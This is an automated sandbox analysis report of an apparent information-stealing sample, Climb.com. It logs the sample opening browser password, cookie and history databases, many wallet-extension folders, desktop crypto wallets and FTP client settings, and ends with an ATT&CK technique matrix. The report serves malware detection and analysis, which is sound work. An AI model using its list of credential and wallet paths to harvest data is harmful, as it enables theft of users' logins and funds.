                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Climb.comBinary or memory string: WIN_81
                Source: Climb.comBinary or memory string: WIN_XP
                Source: Alt.11.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Climb.comBinary or memory string: WIN_XPe
                Source: Climb.comBinary or memory string: WIN_VISTA
                Source: Climb.comBinary or memory string: WIN_7
                Source: Climb.comBinary or memory string: WIN_8
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: Yara matchFile source: Process Memory Space: Climb.com PID: 6996, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Climb.com PID: 6996, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AE2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,14_2_00AE2263
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00AE1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,14_2_00AE1C61
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                121
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol41
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
